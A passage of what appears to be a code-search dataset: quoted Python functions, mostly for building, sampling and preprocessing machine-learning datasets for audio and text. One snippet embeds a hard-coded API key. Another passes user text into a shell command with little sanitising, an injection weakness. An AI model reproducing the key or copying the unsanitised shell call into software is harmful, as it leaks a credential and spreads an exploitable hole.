\n else:\n noise_onset = rs.randint(0, len_noise - len_speech, size=1)[0]\n nosie_offset = noise_onset + len_speech\n \n if cnt % 100 == 0:\n print(cnt)\n \n cnt += 1\n f.write(\"%s\\t%s\\t%d\\t%d\\n\" % (speech_na, noise_na, noise_onset, nosie_offset))\n f.close()\n print(out_csv_path)\n print(\"Create %s mixture csv finished!\" % data_type)", "def create(self) -> List[\"Sample\"]:\n self.is_savable(do_raise=True)\n return self.session.utils.create_samples([self])", "def _create_fake_dataset(output_path, seq_length, include_sentence_id):\n writer = tf.io.TFRecordWriter(output_path)\n\n def create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n for i in range(100):\n features = {}\n input_ids = np.random.randint(100, size=(seq_length))\n features['input_ids'] = create_int_feature(input_ids)\n features['input_mask'] = create_int_feature(np.ones_like(input_ids))\n features['segment_ids'] = create_int_feature(np.ones_like(input_ids))\n features['label_ids'] = create_int_feature(\n np.random.randint(10, size=(seq_length)))\n if include_sentence_id:\n features['sentence_id'] = create_int_feature([i])\n features['sub_sentence_id'] = create_int_feature([0])\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n writer.write(tf_example.SerializeToString())\n writer.close()", "def get_preprocessed_dataset(self, hop_length=512, norm_to_C=False, spectrogram_generator=log_mel_spectrogram, n_frames=500, from_song_ind = 0, to_song_ind = 225, separately = False) -> tuple:\n FEATURESs = []\n CHORDs = self.CHORDS\n TIME_BINSs = []\n KEYs = []\n i = 0\n separate_data, separate_targets = [], []\n for data, keys, chords in zip(self.DATA, self.KEYS, self.CHORDS):\n print(i)\n if(i >= from_song_ind and i < to_song_ind):\n if separately:\n features = IsophonicsDataset.preprocess_audio(waveform=data.WAVEFORM, sample_rate=data.SAMPLE_RATE, spectrogram_generator=spectrogram_generator, nfft=self.NFFT, hop_length=hop_length, norm_to_C=norm_to_C, key=keys.get_first_key()).swapaxes(0,1)\n num_samples, _ = features.shape\n time_bins = [float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)]\n prep_data, prep_targets = Dataset.songs_to_sequences(FEATURESs=[features], CHORDs=[chords], TIME_BINSs=[time_bins], KEYs=[keys.get_first_key()], n_frames=n_frames, norm_to_C=norm_to_C)\n separate_data.append(prep_data)\n separate_targets.append(prep_targets)\n else:\n FEATURESs.append((IsophonicsDataset.preprocess_audio(waveform=data.WAVEFORM, sample_rate=data.SAMPLE_RATE, spectrogram_generator=spectrogram_generator, nfft=self.NFFT, hop_length=hop_length, norm_to_C=norm_to_C, key=keys.get_first_key()).swapaxes(0,1)))\n num_samples, _ = FEATURESs[-1].shape\n TIME_BINSs.append([float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)])\n KEYs.append(keys.get_first_key())\n i = i + 1\n if separately:\n return np.array(separate_data), np.array(separate_targets)\n else:\n return Dataset.songs_to_sequences(FEATURESs=FEATURESs, CHORDs=CHORDs, TIME_BINSs=TIME_BINSs, KEYs=KEYs, n_frames=n_frames, norm_to_C=norm_to_C)", "def create_synthetic_noise_dataset(cfg):\n from colorednoise import powerlaw_psd_gaussian\n\n betas = np.linspace(cfg['data.mix_synthetic_noise.min_beta'],\n cfg['data.mix_synthetic_noise.max_beta'],\n num=cfg['data.mix_synthetic_noise.num_samples'])\n sample_rate = cfg['data.sample_rate']\n segment_length = 2 * cfg['data.len_min']\n wavs = [powerlaw_psd_gaussian(beta, sample_rate * 
segment_length)\n for beta in betas]\n wavs = [audio.normalize(wav, low=-1, high=1) for wav in wavs]\n return NoiseDataset(wavs)", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' + self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab", "def generate_data(self):\n\n column_num = 1\n src_path = self.src_paths_after_pre_process\n target_path = self.tgt_paths_after_pre_process\n\n src_ds = load_textline_dataset([src_path], column_num)\n\n src_ds = src_ds[0]\n\n input_pipeline_func = self.get_input_pipeline(for_export=False)\n\n src_ds = src_ds.map(\n input_pipeline_func, num_parallel_calls=self.num_parallel_calls)\n\n src_size_ds = src_ds.map(\n lambda x: compute_sen_lens(x, padding_token=utils.PAD_IDX),\n num_parallel_calls=self.num_parallel_calls)\n\n src_ds = src_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n\n if self.infer_without_label:\n data_set = tf.data.Dataset.zip((src_ds, src_size_ds))\n\n else:\n tgt = load_textline_dataset([target_path], column_num)\n tgt = tgt[0]\n tgt_out_ds = tgt.map(lambda x: x + ' ' + self.END_TOKEN)\n tgt_in_ds = tgt.map(lambda x: self.START_TOKEN + ' ' + x)\n\n tgt_in_ds = tgt_in_ds.map(\n lambda batch: self.text_pipeline_func(batch, self.max_dec_len, self.\n text_vocab_file_path),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_in_size_ds = tgt_in_ds.map(\n lambda x: compute_sen_lens(x, padding_token=utils.PAD_IDX),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_in_ds = tgt_in_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n\n inp_ds = tf.data.Dataset.zip(\n (src_ds, src_size_ds, tgt_in_ds, tgt_in_size_ds))\n\n if self.use_label_vocab:\n target_vocab_file_path = self.label_vocab_file_paths[0]\n else:\n target_vocab_file_path = self.text_vocab_file_path\n tgt_out_ds = tgt_out_ds.map(\n lambda batch: self.text_pipeline_func(batch, self.max_dec_len,\n target_vocab_file_path),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_out_ds = tgt_out_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n data_set = tf.data.Dataset.zip((inp_ds, tgt_out_ds))\n\n vocab_dict = load_vocab_dict(self.text_vocab_file_path)\n vocab_size = len(vocab_dict)\n label_vocab_dict = load_vocab_dict(self.label_vocab_file_paths[0])\n label_vocab_size = len(label_vocab_dict)\n data_size = get_file_len(self.src_paths_after_pre_process)\n self.config['data']['vocab_size'] = vocab_size\n self.config['data']['label_vocab_size'] = label_vocab_size\n self.config['data']['{}_data_size'.format(self.mode)] = data_size\n\n return data_set", "def generate_dataset(self):\n sets = {\n \"train\": 10,\n \"test\": 5,\n }\n\n fields = {\n \"strings_list\": lambda x: str_to_ascii(self.generate_string_list(x)),\n \"data\": lambda x: np.random.randint(0, 10, (x, 10)),\n \"number\": lambda x: np.array(range(x)),\n \"field_with_a_long_name_for_printing\": lambda x: np.array(range(x)),\n }\n\n lists = {\n \"list_dummy_data\": np.array(range(10)),\n \"list_dummy_number\": np.array(range(10), dtype=np.uint8),\n }\n\n dataset = {}\n data_fields = {}\n for set_name in sets:\n dataset[set_name] = 
self.populate_set(sets[set_name], fields, lists)\n data_fields[set_name] = sorted(dataset[set_name].keys())\n\n return dataset, data_fields", "def generate_datasets(self, rand=None, *args, **kwargs):\n raise NotImplementedError()", "def get_data(self, num_samples):\n data = []\n for _ in range(num_samples):\n t, acqd, sample = self.get_sample()\n data.append(ReSkinData(\n time=t,\n acq_delay=acqd,\n data=sample,\n dev_id=self.device_id\n ))\n \n return data", "def get_speech_seed():\n return [\"http://www.americanrhetoric.com/speechbanka-f.htm\",\n \"http://www.americanrhetoric.com/speechbankg-l.htm\",\n \"http://www.americanrhetoric.com/speechbankm-r.htm]\",\n \"http://www.americanrhetoric.com/speechbanks-z.htm\"]", "def prepare_audio(a_name, target=False):\n samprate = 16000 # Sampling Rate\n length = 16 # Amount of blocks for 1 walkthrough\n overlap = 8 # Step between samples in amount of blocks\n fft = 1024 # Length of block (64ms)\n\n # Upload and preparing data sets\n # audio_path = \"raw_data_wav/\"\n # full_a_name = audio_path + a_name\n print('loading %s' % a_name)\n audio, _ = lr.load(a_name, sr=samprate)\n audio = filter_audio(audio) # Removing silence and spaces between words\n data = lr.stft(audio, n_fft=fft).swapaxes(0, 1) # Export spectrogram\n samples = []\n\n for i in range(0, len(data) - length, overlap):\n samples.append(np.abs(data[i:i + length])) # Create training sample\n\n results_shape = (len(samples), 1)\n results = np.ones(results_shape) if target else np.zeros(results_shape)\n\n return np.array(samples), results", "def main():\n # get config and processing of clauses\n config = Config(load=False)\n\n # Generators\n dev = Dataset(config.filename_dev)\n test = Dataset(config.filename_test)\n train = Dataset(config.filename_train)\n\n # Build tags vocab\n vocab_tags = get_tag_vocab([train, dev, test])\n vocab_tags.add(UNK)\n\n # Save vocab\n write_vocab(vocab_tags, config.filename_tags)\n\n\n # Build and save char vocab\n train = Dataset(config.filename_train)\n vocab_chars = get_char_vocab(train)\n write_vocab(vocab_chars, config.filename_chars)", "def sim_dataset(rs, num_encs,M,pos_class_rate = 0.5):\n np.random.seed(seed=rs)\n data = []\n num_timepoints = np.random.randint(30,50, size=num_encs)\n #signal used to modify timeseries of cases:\n channel_vec = np.random.randint(-1,2,M) #vector of values from -1 to 1 of length M \n #Define patient ids and cases & controls \n pat_ids = np.arange(num_encs)\n case_index = int(num_encs*pos_class_rate) \n case_ids = pat_ids[:case_index]\n control_ids = pat_ids[case_index:] \n \n print(f'Simming {num_encs} patients ..') \n #Generate Data for cases and controls\n for i in pat_ids:\n length = num_timepoints[i]\n if i < case_index:\n #generate case\n labels, onset = create_label(length, case=True)\n X = generate_time_series(length, M)\n X = add_signal(X, onset, channel_vec) \n X['SepsisLabel']= labels \n else:\n #generate control\n labels, _ = create_label(length, case=False)\n X = generate_time_series(length, M)\n X['SepsisLabel']= labels\n data.append(X) \n #Shuffle list of patients\n np.random.shuffle(data)\n return data", "def data_gen(voc_size, batch, nbatches, seq_len = 15):\r\n for i in range(nbatches):\r\n # (batch_size, seq_len)\r\n data = torch.from_numpy(\r\n np.random.randint(1, voc_size, size=(batch, seq_len)))\r\n data[:, 0] = 1 # add start token\r\n src = Variable(data, requires_grad=False)\r\n tgt = Variable(data, requires_grad=False)\r\n yield Batch(src, tgt, 0) # Accessed by next function one by one\r", "def 
sample(self,\n data: Sequence[Sequence[torch.Tensor]],\n n_epochs: int = 1) -> Tuple[List[List[int]], List[List[int]], List[int]]:\n\n all_queries = []\n all_targets = []\n for q, t in data:\n all_queries.append(q)\n all_targets.append(t)\n\n print(f'sampler size: {len(all_queries)}')\n\n\n self.n_batch = int(np.ceil(data.__len__() / self.batch_size))\n print(\"n_batch:\", self.n_batch)\n\n for i in range(self.n_batch):\n # position = i * self.batch_size\n # queries = all_queries[position:position + self.batch_size]\n # targets = all_targets[position:position + self.batch_size]\n sample_index = np.random.choice(len(all_queries), self.batch_size)\n queries = [all_queries[i] for i in sample_index]\n targets_label = [all_targets[i] for i in sample_index]\n\n # targets = self.transform_label(targets_label)\n\n # labels = np.arange(len(queries))\n\n # queriess = np.array(queries)\n all_targets_text = self.all_targets\n queries = pad_sequence(queries, batch_first=self.batch_first, padding_value=0)\n\n # targets, queries, labels = torch.tensor(targets), torch.tensor(labels)\n # print(queries[:5])\n # print(len(all_targets_text))\n\n\n targets_label = torch.tensor(targets_label)\n yield (queries, all_targets_text, targets_label)", "def _create(self, sound: (list, tuple), data: dict):\n # data substitution\n # TODO: use other params\n inversion: int = data['inversion']\n single_tone: bool = data['single_tone']\n with_bass: bool = data['with_bass']\n bass_note: int = data['bass_note']\n transpose: int = data['transpose']\n octave: int = data['octave']\n pitch: float = data['pitch']\n sec: float = data['sec']\n sampling_rate: int = data['sampling_rate']\n volume_adjustment: (str, float) = data['volume_adjustment']\n title: str = data['title']\n at: str = data['at']\n\n # -*- data sanitization -*-\n # transpose range\n if transpose < -11 or 11 < transpose:\n raise ValueError('\\'transpose\\' should be between -11 and 11.')\n\n # pitch range\n if pitch < 410 or 494 < pitch:\n raise ValueError('\\'pitch\\' should be between 410 and 494.')\n\n # file title regulation\n if not re.fullmatch(r'.+?\\.wav$', title):\n title += '.wav'\n\n # wave initialization\n wave = SoundGenerator.oscillator(0, sec, sampling_rate)\n # -*- end of the data sanitization -*-\n\n # elements' frequencies\n fn = -1 # fn is a num the one before\n\n # wave synthesize\n for i in sound:\n if fn >= i:\n # 15 = 12(octave) + 3(C base-> A base convert)\n f = pitch * 2 ** ((15 + i) / 12)\n else:\n f = pitch * 2 ** ((3 + i) / 12)\n\n wave += SoundGenerator.oscillator(f, sec, sampling_rate)\n\n # memory a number the one before\n fn = i\n\n # volume controlling\n if volume_adjustment == 'auto':\n wave *= 0.1\n elif isinstance(volume_adjustment, (int, float)):\n wave *= volume_adjustment\n else:\n ValueError('\\'volume_adjustment\\' should be \\'auto\\' or float.')\n\n # wave convert\n wave = (wave * float(2 ** 15 - 1)).astype(np.int16)\n\n # path management\n if at is None:\n pth = os.path.join(os.getcwd(), title)\n else:\n os.chdir(at)\n pth = os.path.join(os.getcwd(), title)\n\n # make wave_file\n wavfile.write(pth, sampling_rate, wave)", "async def generate_audio(self, site, text, payload):\n cache_path = self.config['services']['Pico2wavTtsService'].get(\n 'cache_path', '/tmp/tts_cache')\n value = payload.get('id', 'no_id')\n\n if text:\n short_text = text[0:100].replace(' ', '_').replace(\".\", \"\")\n # speakable and limited\n say_text = text[0:300].replace('(', '').replace(')', '')\n short_file_name = clean_filename('tts-' + 
str(short_text)) + '.wav'\n file_name = os.path.join(cache_path, short_file_name)\n\n # generate if file doesn't exist in cache\n if not os.path.isfile(file_name):\n path = self.config['services']['Pico2wavTtsService']['binary_path']\n command = path + ' -w=' + file_name + ' \"{}\" '.format(say_text)\n executor = concurrent.futures.ProcessPoolExecutor(\n max_workers=1,\n )\n await self.loop.run_in_executor(executor, os_system, command)\n\n async with aiofiles.open(file_name, mode='rb') as send_file:\n audio_file = await send_file.read()\n await self.client.subscribe('hermod/{}/speaker/finished'.format(site))\n if site in self.clients and self.clients[site].get(\n 'platform', '') == \"web\" and self.clients[site].get('url', False):\n await self.client.publish(\\\n 'hermod/{}/speaker/play/{}'.format(site, value), payload=json.dumps({\n \"url\": self.clients[site].get('url') + \"/tts/\" + short_file_name\n }), qos=0)\n else:\n slice_length = 2048\n\n def chunker(seq, size):\n \"\"\" return chunks\"\"\"\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n for chunk in chunker(audio_file, slice_length):\n await self.client.publish('hermod/{}/speaker/cache/{}'.format(site, value)\\\n , payload=bytes(chunk), qos=0)\n\n # finally send play message with empty payload\n await self.client.publish(\n 'hermod/{}/speaker/play/{}'.format(site, value), payload=None, qos=0)\n\n await self.cleanup_file(short_text, file_name)", "def build_dataset(bandits, T, H, seq):\n K = bandits[0].K\n dataset = {}\n for h in range(H):\n samples_h = bandits[seq[h]].sample(T)\n dataset[h] = samples_h\n return dataset", "def generate_mog_dataset():\n\n n_per_class = 100\n dim = 2\n n_gaussians = 4\n mus = [(0, 1), (-1, 0), (0, -1), (1, 0)]\n mus = [torch.tensor(m) for m in mus]\n var = 0.05\n\n inputs, labels = [], []\n\n for id in range(n_gaussians):\n # Generate input data by mu + x @ sqrt(cov)\n cov = np.sqrt(var) * torch.eye(dim)\n mu = mus[id]\n inputs.append(mu + torch.randn(n_per_class, dim) @ cov)\n\n # Labels\n labels.append(torch.tensor(n_per_class * [1.0 if id < 2 else 0.0]))\n\n return torch.cat(inputs, dim=0), torch.cat(labels, dim=0)", "def build_dataset(words):\n count = []\n # count.extend(collections.Counter(words).most_common(n_words - 1))\n count.extend(collections.Counter(words).most_common())\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n # unk_count = 0\n for word in words:\n index = dictionary.get(word, 0)\n # if index == 0: # dictionary['UNK']\n # unk_count += 1\n data.append(index)\n # count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n data = [data[::2],data[1::2]]\n new_data = list()\n for i in range(len(data[0])):\n new_data.append([data[0][i],data[1][i]])\n data = new_data\n vocabulary_size = len(dictionary)\n print(\"\\n\\ndictionary size = \")\n print(len(dictionary))\n return data, count, dictionary, reversed_dictionary, vocabulary_size", "def dataset(options):\n pass", "def get_unprocessed_data(self, how_many, model_settings, mode):\n candidates = self.data_index[mode]\n if how_many == -1:\n sample_count = len(candidates)\n else:\n sample_count = how_many\n desired_samples = model_settings['desired_samples']\n words_list = self.words_list\n data = np.zeros((sample_count, desired_samples))\n labels = []\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n wav_loader = io_ops.read_file(wav_filename_placeholder)\n wav_decoder = 
contrib_audio.decode_wav(\n wav_loader, desired_channels=1, desired_samples=desired_samples)\n foreground_volume_placeholder = tf.placeholder(tf.float32, [])\n scaled_foreground = tf.multiply(wav_decoder.audio,\n foreground_volume_placeholder)\n for i in range(sample_count):\n if how_many == -1:\n sample_index = i\n else:\n sample_index = np.random.randint(len(candidates))\n sample = candidates[sample_index]\n input_dict = {wav_filename_placeholder: sample['file']}\n if sample['label'] == SILENCE_LABEL:\n input_dict[foreground_volume_placeholder] = 0\n else:\n input_dict[foreground_volume_placeholder] = 1\n data[i, :] = sess.run(scaled_foreground, feed_dict=input_dict).flatten()\n label_index = self.word_to_index[sample['label']]\n labels.append(words_list[label_index])\n return data, labels", "def generate_datasets(self) -> (tf.data.Dataset, tf.data.Dataset):\n self.obtain_meta_data_frame_for_available_lightcurves()\n positive_example_paths = self.meta_data_frame[self.meta_data_frame['disposition'] == 'PC']['lightcurve_path']\n print(f'{len(positive_example_paths)} positive examples.')\n negative_example_paths = self.meta_data_frame[self.meta_data_frame['disposition'] != 'PC']['lightcurve_path']\n print(f'{len(negative_example_paths)} negative examples.')\n positive_datasets = self.get_training_and_validation_datasets_for_file_paths(positive_example_paths)\n positive_training_dataset, positive_validation_dataset = positive_datasets\n negative_datasets = self.get_training_and_validation_datasets_for_file_paths(negative_example_paths)\n negative_training_dataset, negative_validation_dataset = negative_datasets\n training_dataset = self.get_ratio_enforced_dataset(positive_training_dataset, negative_training_dataset,\n positive_to_negative_data_ratio=1)\n validation_dataset = positive_validation_dataset.concatenate(negative_validation_dataset)\n if self.trial_directory is not None:\n self.log_dataset_file_names(training_dataset, dataset_name='training')\n self.log_dataset_file_names(validation_dataset, dataset_name='validation')\n training_dataset = training_dataset.shuffle(buffer_size=len(list(training_dataset)))\n training_preprocessor = lambda file_path: tuple(tf.py_function(self.training_preprocessing,\n [file_path], [tf.float32, tf.float32]))\n training_dataset = training_dataset.map(training_preprocessor, num_parallel_calls=16)\n training_dataset = training_dataset.padded_batch(self.batch_size, padded_shapes=([None, 2], [None])).prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n validation_preprocessor = lambda file_path: tuple(tf.py_function(self.evaluation_preprocessing,\n [file_path], [tf.float32, tf.float32]))\n validation_dataset = validation_dataset.map(validation_preprocessor, num_parallel_calls=4)\n validation_dataset = validation_dataset.padded_batch(1, padded_shapes=([None, 2], [None])).prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n return training_dataset, validation_dataset", "def _make_data(self):\n pdf_datasets_all = make_pdf_datasets(self.pdf_list, self.xlims, self.ylims, self.tlims, self.dims, 9)\n self.pdf_dataset = np.concatenate(pdf_datasets_all, axis = 0)\n self.PDE_dataset = make_PDE_dataset(self.num_collocation, self.xlims, self.ylims, self.tlims, self.dims)\n self.BC_dataset = make_BC_dataset(self.num_BC, self.xlims, self.ylims, self.tlims, self.dims)", "def sample_survey(self, **kwargs):", "def generate(model, voc, maxlen=20, diversity=0.5, numchars=100):\n\n text, char_indices, indices_char = voc\n chars = set(text)\n start_index = 
random.randint(0, len(text) - maxlen - 1) \n generated = ''\n sentence = text[start_index: start_index + maxlen]\n #print(\"Insert text to start from [min 20 chars]:\")\n #sentence = str(raw_input())\n #sentence = sentence[:maxlen]\n generated += sentence\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n for i in range(numchars):\n x = np.zeros((1, maxlen, len(chars)))\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.\n \n preds = model.predict(x, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n generated += next_char\n sentence = sentence[1:] + next_char\n sys.stdout.write(next_char)\n sys.stdout.flush()\n print()", "def generateFeatureData(directory, outFileName='tmp/features.txt', isClassifying=False):\n\n audioList = getAudioFiles(directory)\n\n outFile = open(outFileName, \"w\")\n\n for audio in audioList:\n features = audio.getFeatures()\n \n if isClassifying: # We are classifying, we don't know type\n audioType = '0'\n else: # We are generating training data. Try to predict using file name\n audioType = '1' if audio.predictType() == 'Music' else '-1'\n \n outFile.write(audioType + ' ' + features + ' # ' + audio.name + '\\n')\n\n outFile.close()\n\n return audioList", "def prepare_dataset(self, data_raw):\n\n self._logger.debug(f'Preparing dataset ({len(data_raw)} lines)...')\n data = []\n line_count = 0\n sample_count = 0\n sample_count_failed = 0\n\n for line in tqdm(data_raw):\n line_count += 1\n #self._logger.debug(f'Line {line_count}/{len(data_raw)}')\n\n try:\n # TODO Call prepare_sample() here?\n sample = {}\n\n sample['text'] = line['text']\n sample['text_tokenized'] = None # set by add_tokens()\n sample['text_attention_mask'] = None # set by add_tokens()\n sample['item_name'] = line['string']\n self.add_tokens(sample)\n sample['text_mention_mask'] = None # set by add_mention_mask()\n self.add_mention_mask(sample)\n\n # Once for correct Wikidata item\n sample['item_id'] = line['correct_id']\n sample['item_pbg'] = self._pbg.get_item_embedding(line['correct_id'])\n sample['item_glove'] = np.empty((1, 900)) # TODO\n sample['answer'] = True\n data.append(sample)\n sample_count += 1\n\n # Once for wrong Wikidata item\n sample['item_id'] = line['wrong_id']\n sample['item_pbg'] = self._pbg.get_item_embedding(line['wrong_id'])\n sample['item_glove'] = np.empty((1, 900)) # TODO\n sample['answer'] = False\n data.append(sample)\n sample_count += 1\n\n except ValueError as e: # skip sample when there is no embedding found\n self._logger.info(str(e))\n sample_count_failed += 1\n continue\n\n self._logger.debug(f'Prepared {sample_count} samples from {line_count} lines (skipped {sample_count_failed} failed)')\n\n return data", "def dynamic(seq: List[int]):\n return Data._create_dataset(seq, pad=False)", "def get_data(self):\n if self.random_seeds: \n self._validate_random_seeds()\n seed_iter = list(map(iter,self.random_seeds))\n nsamples = len(self.random_seeds[0])\n else:\n seed_iter = None\n nsamples = self.numsamples\n self._set_meta_features()\n for _ in tqdm(range(nsamples)):\n self._update_meta_features(seed_iter)\n self._sample()\n yield self._extract_features()", "def build_training_data():\r\n for i in range(len(FILE_NAMES)):\r\n input_text = read_file(FILE_NAMES[i])\r\n list_of_word_lines = limiting_sentence_length(input_text)\r\n data = create_training_data_file(list_of_word_lines, LANGUAGE[i])\r\n write_training_data(data, LANGUAGE[i])\r\n merge_training_data()", "def 
sample(self, n_samples, batch_size, word_0=-1, gen_type='multinom'):\n # Compute the number of batches\n if n_samples != batch_size:\n n_batches = n_samples // batch_size + 1\n else:\n n_batches = 1\n\n samples = torch.zeros(n_batches * batch_size, self.max_len).long()\n\n # Produce samples by batches\n for batch in range(n_batches):\n hidden = self.init_hidden(batch_size)\n if word_0 < 0:\n # Initialize every sequence with a random word from the vocabulary\n input = torch.randint(low=0, high=self.voc_dim, size=(batch_size,))\n else:\n # Initialize every sequence with 'word_0' as starting token\n input = torch.LongTensor([word_0] * batch_size)\n if self.gpu:\n input = input.cuda()\n\n # Iterate the generator until we reach the maximum length allowed for the sequence\n for i in range(self.max_len):\n # Forward pass where we keep track of the hidden states of the network\n output, hidden = self.forward(input, hidden, require_hidden=True)\n\n if gen_type == 'multinom':\n # Generate the next token in the sequence randomly using the output as a multinomial distribution\n next_token = torch.multinomial(torch.exp(output), 1)\n elif gen_type == 'argmax':\n # Choose the most probable token in the sequence deterministically\n next_token = torch.argmax(torch.exp(output), 1)\n\n # Append generated ith tokens to batch #'batch'\n samples[batch * batch_size:(batch + 1) * batch_size, i] = next_token.view(-1)\n\n # Add generated tokens to the input\n input = next_token.view(-1)\n\n # We need this because the number of samples might not be divisible by the size of batches\n samples = samples[:n_samples]\n\n return samples", "def run(self):\n from audio import AudioRecorder\n\n loader = SingleInputLoader(128)\n recorder = AudioRecorder()\n\n with tf.Session() as sess:\n model = create_default_model('record', 128, loader)\n model.restore(sess, 'train/best-weights')\n \n while True:\n print('Listening...')\n audio, width = recorder.record()\n audio = np.array(audio)\n\n #calculate the power spectrum of the audio and of sampling rate 16000 \n input_ = preprocess.calculatePowerSpectrogram(audio, 16000)\n\n loader.set_input(input_)\n [decoded] = model.step(sess, loss=False, update=False, decode=True)\n\n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n print('Predicted: {}'.format(decoded_str))", "def generate(self, no_samples):\n raise NotImplementedError(\"Implement this method.\")", "def api_speech(data, ua):\n # Random header\n headers = {\n 'Content-Type': 'audio/x-flac; rate=16000;',\n 'User-Agent': ua['google chrome'],\n }\n params = (\n ('client', 'chromium'),\n ('pFilter', '0'),\n ('lang', 'en'),\n ('key', 'AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw'),\n )\n\n proxies = None\n\n if len(data) == 0:\n return\n\n # api call\n try:\n response = requests.post('http://www.google.com/speech-api/v2/recognize',\n proxies=proxies,\n headers=headers,\n params=params,\n data=data)\n except Exception as inst:\n print(inst)\n\n # Parse api response\n try:\n transcript = extract_transcript(response.text)\n return transcript\n except Exception as inst:\n print(inst)\n return", "def generate_dataset(self):\n dataset = []\n for i in range(self._num_instances):\n dataset.append(self._generate_instance())\n description = {\"num_instances\": self._num_instances,\n \"num_curves\": self._num_curves,\n \"num_eval_points\": self._num_eval_points,\n \"num_control_points\": 
self._num_control_points,\n \"min_distance\": self._min_distance,\n \"min_length\": self._min_length,\n \"seed\": self._seed}\n return dataset, description", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def prepare_data(vocabulary_size):\n print(\"Downloading data from \" + _DATA_DIR_ +\"..\")\n getData(_DATA_DIR_)\n print(\"Creating Vocabulary..\")\n create_vocabulary( _VOCAB_DIR_, _RAW_SENTENCES_DIR_, vocabulary_size )\n print(\"Converting sentences to sequences of ids..\")\n data_to_token_ids( _RAW_SENTENCES_DIR_ , _SENTENCES_DIR, _VOCAB_DIR_ )", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()\n \n out_dataset[0].create_dataset(in_dataset[0])\n out_dataset[1].create_dataset(in_dataset[1])\n\n in_pData, out_pData = self.get_plugin_datasets()\n\n in_pData[0].plugin_data_setup( 'SINOGRAM',multiple)\n out_pData[0].plugin_data_setup( 'PROJECTION','multiple')\n\n in_pData[1].plugin_data_setup( 'PROJECTION',)\n out_pData[1].plugin_data_setup( 'PROJECTION','multiple')", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen 
